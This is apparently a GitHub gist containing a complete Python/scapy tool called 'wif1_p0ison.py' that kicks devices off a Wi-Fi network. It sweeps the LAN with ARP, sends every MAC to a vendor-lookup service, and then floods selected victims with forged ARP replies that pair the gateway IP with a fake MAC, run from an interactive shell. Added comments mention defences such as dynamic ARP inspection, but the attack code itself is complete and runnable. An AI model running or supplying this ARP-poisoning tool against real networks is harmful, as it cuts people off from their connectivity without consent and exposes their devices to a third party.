@andreafioraldi
Last active March 15, 2020 02:12
Kick off a device from wifi --- Use it only against your sister
#!/usr/bin/env python
import os
import socket
import time

import requests
from scapy.all import *
# MAC address that poison() advertises for the gateway's IP in place of the
# gateway's real MAC. First octet 0x12 marks it as unicast and locally
# administered. NOTE(review): presumably no real host owns this address; the
# file never checks that.
DEFAULT_BAD_GATEWAY = '12:34:56:78:9A:BC'
class Device(object):
    """One host that answered the ARP sweep: IP, MAC and vendor label."""

    def __init__(self, ip, mac, vendor):
        # Plain record; the values are stored exactly as the caller passes them.
        self.ip, self.mac, self.vendor = ip, mac, vendor

    def __str__(self):
        """Render the record as ``"<ip> <mac> <vendor>"`` for the listings."""
        fields = (self.ip, self.mac, self.vendor)
        return "%s %s %s" % fields
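def scan_lan():
    """ARP-sweep the local network and return ``(gateway_ip, gateway_mac, devices)``.

    The local address is read from a UDP socket connected towards google.com,
    so working name resolution and a default route are required. The sweep
    covers ``a.b.c.*`` and the gateway is assumed to sit at ``a.b.c.1``; both
    are guesses derived from the local address, not from the routing table.

    Returns:
        gateway_ip: the assumed gateway address (always set).
        gateway_mac: MAC that answered for ``gateway_ip``, or ``None`` when
            nothing answered from that address.
        devices: list of ``Device`` records, one per ARP answer.

    Privacy note: every discovered MAC address is sent to the third-party
    macvendors.co API over plain HTTP, which discloses the devices on this
    LAN to that service and to anyone able to observe the request.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # connect() on a UDP socket only selects the outgoing interface; the
        # finally block closes the socket even when resolution fails.
        s.connect(("google.com", 80))
        lan_ip = s.getsockname()[0]
    finally:
        s.close()

    # Everything up to and including the last dot, e.g. "192.168.1.".
    prefix = lan_ip[:lan_ip.rfind(".") + 1]
    lan_range = prefix + "*"
    gateway_ip = prefix + "1"
    gateway_mac = None

    answers, _ = arping(lan_range, verbose=0)
    scan_result = []
    for answer in answers:
        mac = answer[1].hwsrc
        ip = answer[1].psrc
        if ip == gateway_ip:
            gateway_mac = mac
        try:
            # Bounded wait: without a timeout one stalled lookup blocks the
            # whole scan indefinitely.
            r = requests.get('http://macvendors.co/api/%s' % mac, timeout=5)
            vendor = str(r.json()["result"]["company"])
        except (requests.RequestException, ValueError, KeyError, TypeError):
            # Network failure, non-JSON body or unexpected JSON shape. The
            # original bare `except:` also swallowed CTRL+C at this point.
            vendor = "<vendor not found>"
        scan_result.append(Device(ip, mac, vendor))
    return gateway_ip, gateway_mac, scan_result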
def poison(device, gateway_ip):
    """Send ``device`` one forged ARP reply for the gateway's IP address.

    The reply (``op=2``) pairs ``gateway_ip`` with ``DEFAULT_BAD_GATEWAY``
    rather than the gateway's real MAC and is addressed to the device's own
    IP and MAC.

    Defender's view: this is an unsolicited ARP reply whose sender MAC for the
    gateway IP differs from the real gateway's. Dynamic ARP inspection on the
    switch or access point, or a static ARP entry for the gateway on the host,
    keeps such a reply from replacing the cached mapping.
    """
    forged_reply = ARP(
        op=2,
        psrc=gateway_ip,
        hwsrc=DEFAULT_BAD_GATEWAY,
        pdst=device.ip,
        hwdst=device.mac,
    )
    send(forged_reply, verbose=0)
def restore(device, gateway_ip, gateway_mac):
    """Send ``device`` one ARP reply carrying the gateway's recorded MAC.

    Same packet shape as ``poison()``, but ``hwsrc`` is ``gateway_mac``, the
    address the caller recorded for the gateway. Exactly one reply is sent per
    call. NOTE(review): nothing here verifies that the device's ARP cache was
    actually corrected.
    """
    corrective_reply = ARP(
        op=2,
        psrc=gateway_ip,
        hwsrc=gateway_mac,
        pdst=device.ip,
        hwdst=device.mac,
    )
    send(corrective_reply, verbose=0)
def banner():
    """Print the tool's title and the list of shell commands."""
    lines = (
        "",
        " ]===== wif1_p0ison.py =====[",
        " ]====== by malweisse ======[",
        "",
        " [ commands ]",
        " scan :: scan the lan for devices",
        " devices :: print prevous scanned devices",
        " add <idx> :: add devices[idx] to the to-block list",
        " add all :: add all scanned devices to the to-block list",
        " remove <idx> :: remove to-block[idx] from the to-block list",
        " remove all :: clean the to-block list",
        " list :: print the to-block list",
        # A " restore <idx> :: reset device[idx] with correct gateway" entry is
        # disabled in the original; shell() has no handler for it.
        " run :: poison all devices in the to-block list",
        " quit :: quit shell",
        "",
    )
    for line in lines:
        # Single-argument print(...) emits the same text as Python 2's print
        # statement; "" stands in for the bare `print` blank lines.
        print(line)
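def shell():
    """Run the interactive command loop described by ``banner()``.

    State kept between commands: the gateway IP/MAC and device list from the
    last ``scan``, and the to-block list edited with ``add``/``remove``.
    ``run`` keeps calling ``poison()`` for every listed device until CTRL+C,
    then calls ``restore()`` once per device if the gateway MAC is known.
    ``quit`` leaves through ``exit(0)``; the function never returns normally.

    Input is read with ``raw_input`` (Python 2). Messages use single-argument
    ``print(...)``, which prints the same text under the print statement.
    """
    gateway_ip = None
    gateway_mac = None
    devices = []
    block_list = []

    def show(entries):
        # One "(id: N) <device>" line per entry, for both listings.
        for idx, entry in enumerate(entries):
            print("%s %s" % (" (id: %d) " % idx, entry))

    def parse_idx(args, limit):
        # Return a valid index into a list of length `limit`, or None after
        # printing the error message.
        try:
            idx = int(args[1])
        except ValueError:
            idx = -1
        if idx < 0 or idx >= limit:
            print(" >> invalid idx")
            return None
        return idx

    while True:
        cmd = raw_input(":> ").split()
        if not cmd:
            continue
        if cmd[0] == "scan":
            print(" >> scanning lan...")
            gateway_ip, gateway_mac, devices = scan_lan()
            show(devices)
            print(" >> scan completed")
            if gateway_mac is None:
                print(" >> WARNING! gateway not found so i can't restore normal wifi behaviour after poisoning!")
                print(" >> quit if you don't know what are you doing.")
        elif cmd[0] == "devices":
            print(" >> scanned devices")
            show(devices)
        elif cmd[0] == "add":
            if len(cmd) == 1:
                print(" >> invalid idx")
                continue
            if cmd[1] == "all":
                # The original loop indexed `devices` with `dev_id`, which is
                # not assigned on this path (NameError, or a stale index left
                # by an earlier command).
                block_list.extend(devices)
                continue
            dev_id = parse_idx(cmd, len(devices))
            if dev_id is not None:
                block_list.append(devices[dev_id])
        elif cmd[0] == "remove":
            if len(cmd) == 1:
                print(" >> invalid idx")
                continue
            if cmd[1] == "all":
                block_list = []
                continue
            dev_id = parse_idx(cmd, len(block_list))
            if dev_id is not None:
                block_list.pop(dev_id)
        elif cmd[0] == "list":
            print(" >> to-block list")
            show(block_list)
        elif cmd[0] == "run":
            if not block_list:
                # An empty list made the original spin in a busy loop doing
                # nothing; it also means no scan has filled gateway_ip yet.
                print(" >> to-block list is empty")
                continue
            print(" >> poisoning...")
            print(" >> press CTRL+C to stop")
            # There is no pause between rounds, so on the wire this is a
            # continuous stream of unsolicited ARP replies for the gateway IP,
            # the pattern ARP monitors such as arpwatch report.
            while True:
                try:
                    for victim in block_list:
                        poison(victim, gateway_ip)
                except KeyboardInterrupt:
                    if gateway_mac is None:
                        print(" >> unable to restore without the gateway mac")
                    else:
                        print(" >> restoring...")
                        for victim in block_list:
                            restore(victim, gateway_ip, gateway_mac)
                        print(' >> done')
                    break
        elif cmd[0] == "quit":
            exit(0)
        else:
            print(" >> invalid command")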
def main():
    """Refuse to start without root, then show the banner and run the shell."""
    # geteuid() == 0 means the effective user is root.
    running_as_root = os.geteuid() == 0
    if not running_as_root:
        print(" >> please use the root user")
        exit(1)
    banner()
    shell()


if __name__ == "__main__":
    main()